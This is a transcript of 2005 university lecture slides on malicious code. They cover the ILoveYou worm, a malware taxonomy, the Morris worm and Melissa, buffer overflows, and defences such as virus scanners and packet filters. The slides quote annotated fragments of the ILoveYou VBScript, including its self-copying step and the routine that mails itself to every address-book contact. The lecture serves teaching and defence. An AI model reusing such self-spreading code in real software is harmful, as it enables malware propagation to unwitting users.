David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.

David Evanshttp://www.cs.virginia.edu/evans

CS588: CryptographyUniversity of VirginiaComputer Science

Lecture 20:Malicious Code

21 April 2005 University of Virginia CS 588 2

Menu

• Examination of ILoveYou Code

• Malicious Code Taxonomy

• Malcode Defenses Overview– Virus Scanners


LoveLetter.VBS

• This 328-line program caused ~$10B in damage

• How much work and smarts was required?


Main Looprem barok -loveletter(vbe) <i hate go to school>rem by: spyder / [email protected] /

@GRAMMERSoft Group / Manila,PhilippinesOn Error Resume Next... wscr.RegWrite "...Scripting Host\

Settings\Timeout", 0sub main()

...Set c = fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")...spreadtoemail()...

end sub

Smart virus writers don’t include their contact information.

Smart people would convey more interesting message.

This was smart – turn off scripting timeout in registry. (Dumb for Microsoft.)


spreadtoemail (edited to fit)sub spreadtoemail()

for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1

for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x)

set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = “kindly check the attached

LOVELETTER coming from me.” male.Attachments.Add(dirsystem&

“\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send

x=x+1 next nextend sub

Smart virus writers understand for loops.

Smart virus writers can spell “mail”.


Be Very Afraid...• When really dumb people with no

resources write malicious programs, it costs $10B.

• What would happen if smart people with resources wrote a malicious program?– Paper link: Staniford, Paxson & Weaver,

How to 0wn the Internet in Your Spare Time (2002)

• “Warhol worm”: 15 minutes to 0wn Internet


Attacking Malicious Code

• “Malicious Code” is a bad name– Code has no intent– Programmer’s intent doesn’t matter, what

the code does matters• As networks get more programmable,

accidentally harmful code will become common

• We’ll use “malcode” (mal = bad)– Its not a great name either...


Taxonomy of Code

All Code

Malcode Harmless Code

Created by Malicious Author

Accidental

(occasionally programs are actually useful, too)


Taxomony of Malcode[Stallings, p. 502]

Malcode

Requires Host Program Independent

VirusesViruses WormsWormsTrojan Trojan HorsesHorses

Self-Replicating

Logic Logic BombsBombs

TrapTrapDoorsDoors

Insiders


Worms and Viruses• People get into stupid arguments over

whether something is a “worm” or a “virus”– Is the Internet a host program?

• See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988

• Is Outlook a host program for an email?

• Similarly, for worms/viruses/Trojans– If the user must open it (e.g., ILoveYou) it is

self-replicating?


Trojan Horses

• Greeks and Trojans at war – Eris (Discord), Paris, Aphroditie, Helen

• Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls.

• Pretended to leave, left big wooden horse as gift• Trojans brought horse into city (had to tear down

part of wall to do this), got silly drunk celebrating victory.

• Greeks jumped out, killed sentries, and let in Greek army.


Modern Trojan Horses• User runs program that looks harmless

– Program pretends to be “cool, dancing bears”, also erases your hard drive

• Most attacks today are Trojan Horses– ILoveYou, Melissa, recent Microsoft attack, etc.

• Rely on modern humans being as dumb as mythical Trojans– No matter how good your city/fire walls are,

they don’t do any good if you can’t stop users from running random code


Differences between Morris Worm 1988 and Melissa/ILoveYou 1999


Vulnerabilities Exploited• Morris Worm:

– Buffer overflow: fingerd uses gets– sendmail debug mode– Weak Unix passwords

• Melissa:– Word enables macros by default, no limitations on

macro behavior

• ILoveYou:– Dumb people will run code attached to email

• Code Red/Nimda:– Buffer overflow in IIS


Buffer Overflows

Frame Pointer

Return Address

char s[64];...

int i;

gets (s);

Input more than 64 bits: gets just writes down stackbit 65: address

of bit 66 on stack

bits 66-...: instructions

int k;


Preventing Buffer Overflows• Use run-time checks on all memory references

– Safe languages (CLU, Java, Eiffel, etc.)– Safe libraries for C (don’t use gets, strcpy, etc.)

• Obfuscation– Randomize locations in memory

• Separate code and data segments– Make code segment unwriteable (once application

loaded), only allow jumps in code segment

• Static analysis– Check binary or source code

• But – about ½ of recent vulnerabilities are still buffer overflows!


Replication Strategy• Morris Worm

– Searched .forward files (should have used .rhosts) to find other hosts to attack

– Used password guessing to break into other accounts

– Used fingerd, sendmail vulnerabilites

• Melissa/ILoveYou– Emails itself to entries in victim’s Outlook

address book


Damage• Morris Worm

– Infected ~6000 computers (10% of Internet)

• Melissa– Infected 1.2 Million machines in a few hours

• ILoveYou– $10 Billion in damage

• Theorized worst case worm– ~$50B (Nicholas Weaver and Vern Paxson, A

Worst-Case Worm, WEIS 2004)


Outcomes• Internet Worm (Robert Morris, Jr.)

– 3 years suspended sentence (no jail time), $10,000 fine.

– Current occupation

• Melissa (David Smith) (~$80m damages)– Plead guilty, Dec 1999 (second successful

prosecution of virus author), link to plea agreement on manifest

– Hired by Rutgers as Computer Technician while awaiting sentencing

• ILoveYou ($10B damages)– Release without penalty, no laws in Philippines


Responses• Morris Worm

– Disconnect from network– Disorganized, phone

• Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed

– DARPA established CERT

• Melissa– CERT Advisory, Eradicated quickly

• But CERT had to rebuild Web server

• ILoveYou– Many countries have since passed laws, Europe treaty

announced last week


Malcode Defenses

1. Prevent malcode from running

2. Limit damage it can do

3. Discourage attackers


Malcode Defenses1. Prevent malcode from running

Virus scanners – recognize known malcode

Firewalls – drop incoming packets

Code signing (only run code from trusted sources)

Education – make users smarter

2. Limit damage it can doSandbox (“Playpen”) – run malcode in protected

virtual machine

Reference monitors – enforce policy on execution

Intrusion Detection, System maintenance

3. Discourage attackersLegal – pass laws to penalize attackers

Today

Tue

sday


Virus Scanners


Virus Scanners• Compare code to a database of known

malicious code– Smart authors create self-mutating viruses– Smart virus scanners try to deal with this (but

usually fail)

• Reasonably useful in days of “sneaker” net (viruses spread on floppies)

• Reasonably useless when viruses spread as fast as email


Virus Spreading

• Read email every hour

• Everyone’s address book contains 50 people

• Infects 300M

people in

6 hours!0

50000000

100000000

150000000

200000000

250000000

300000000

350000000

1 2 3 4 5 6


Code Red


What Virus Scanner Peddlers Do(2001)

http://security.norton.com/


First, it tells you to lower your security settings to allow ActiveX.


Always Click “Yes”

During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear.


What Virus Scanner Peddlers Do(Today)


What it Should Do

• Tell people who have ActiveX turned off, “Good Job”

• Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!


Malcode Defenses1. Prevent malcode from running

Virus scanners – recognize known malcode Firewalls – drop incoming packets Code signing (only run code from trusted sources) Education – make users smarter

2. Limit damage it can doo Sandbox (“Playpen”) – run malcode in protected

virtual machineo Reference monitors – enforce policy on executiono Intrusion Detection, System maintenance

3. Discourage attackers Legal – pass laws to penalize attackers


The Best Firewall

to network

power

Functionality is Bad


Lesser Firewall

to network

firewall (p: packet) { if (allow (p)) forward (p); else drop (p);}


Networks – OSI Model

Application

Presentation

Session

Transport

Network

Data Link

Physical

FTP SMTP HTTP RealPlayer ...

TCP UDP

IP

Ethernet FDDI CDMA Smoke Signals

Other


An IP (V4) Packet

IP V

ersion (4)

IP H

eader Length

Type of S

ervice (not used)

0

Size of

Datagram

16 32

Packet

Identification

48

Flag

s Fragm

ent O

ffset

64

TT

L Transport P

rotocol (e.g., T

CP

)

80

Header

Checksum

96

Source IP

A

ddress

Destination IP

A

ddress

Option

s Dat

a128 160


A Simple Packet Filterboolean allow (packet) {if (match (packet.source,

“18.26.4.*”)) return false; // No packets from Robert Morris’ machines. else if (match (packet.source, “149.150.209.*”))

return false; // Cheaton Hall else return true;

}


Typical Packet Filtering RulesIncoming:

permit 0.0.0.0 128.143.137.19 TCP src >= 1024 dst = 25

permit 0.0.0.0 128.143.137.19 TCP src = 25 dst >= 1024

Outgoing: permit 128.143.137.19 0.0.0.0

TCP src = 25 dst >= 1024permit 128.143.137.19 0.0.0.0

TCP src >= 1024 dst = 25


Packet Filter Layers

Application

Presentation

Session

Transport

Network

Data Link

Physical

FTP SMTP HTTP RealPlayer ...

TCP UDP

IP

Ethernet FDDI CDMA Smoke Signals

Other


Application-Layer Gateways

• Analyze communication at application layer

• All communication must go through a proxy that knows about application

• Able to detect application-level attacks

• Poor scalability, performance

• Fail-safe is annoying


Malcode on the Near Horizon• Cell Phones

– Billions of them worldwide, becoming as complex as computers were in 1988

– About 60% run Symbian OS

• Cabir (November 2004) – spread using Bluetooth (short range networking) on Symbian OS (but required user agreement)

• CommWarrior (March 2005) – spread using phone network (multimedia messages), contact list

• Today: spread limited – only 2% of phones are “smartphones” (this will change soon!)


Malcode Summary• Best defense is education• Next best defense is a good offense

– Tough legal penalties for convicted attackers– Doesn’t work against motivated foreign

governments

• Some Technical Defenses– Virus Scanners– Tuesday:

• Reference Monitors, Proof-Carrying Code• Firewalls, Intrusion Detection


Charge• Project Presentations will be final class: Tuesday,

May 3• Normal project expectation:

– Your team will make a presentation on May 3 (up to 15 minutes, can be as short at 5)

– You will hand in a paper report on May 3– You will put up a web page (that could just be the

same as your paper report)

• Take home final out May 3, due May 7– Some public-key cryptosystems questions– Something involving hash chains– One essay question (security analysis)

David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.

Documents

Transcript of David Evans CS588: Cryptography University of Virginia Computer Science Lecture 20: Malicious Code.